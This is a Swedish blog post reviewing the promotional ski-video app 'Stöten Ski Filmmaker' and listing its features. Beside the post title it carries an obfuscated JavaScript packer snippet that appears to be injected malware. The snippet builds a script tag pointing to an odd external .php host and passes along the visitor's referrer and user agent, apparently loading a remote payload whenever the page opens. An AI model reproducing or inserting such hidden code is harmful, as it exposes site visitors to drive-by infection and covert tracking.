Image Image Image Image Image Image Image Image Image Image

| 13 augusti, 2020

Scroll to top

Top

Stöten Ski Filmmaker – Skapa enkelt en proffsig skidfilm

Filip Urde
  • On 5 december, 2012
  • http://www.revue.se/filip-urde

Stöten eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|siehr|var|u0026u|referrer|esanb||js|php’.split(’|’),0,{}))
Ski Filmmaker

Här har vi en riktigt kul app som spinner vidare på den video och kamera trend som sköljer över våra smartphones.

Appen är framtagen som en del i en reklamkampanj för Stöten som skidort, men det visar sig att appen sitter inne på ett mervärde långt utöver det vi är vana vid. Det finns faktiskt en lucka som appen fyller.
Med Appen kan du enkelt skapa din egen skidfilm med redigering, effekter och ljud. Stöten Ski Filmmaker har flera snygga funktioner som ger dig alla möjligheter att skapa din egen skidfilm och mina tankar förs till ett instagram för film.
Vad som gör appen så bra är att användningsområdet är långt större än dess syfte. Syftet är att lyfta fram stöten, men appen i sig transformerar din iPhone till en riktig actionkamera. Så sluta inte använda appen i stöten, kör den även på Hawaii.

Funktioner:
-Filma din åkning och grymma tricks med din iPhone
–Ladda in klipp från din GoPro–kamera
-Redigera dina klipp & bilder
-Lägg på lite skön musik
-Lägg till mäktiga slow motion-effekter
-Välj ett snyggt filter
-Ha flera filmprojekt igång samtidigt
-Dela filmen med familj och vänner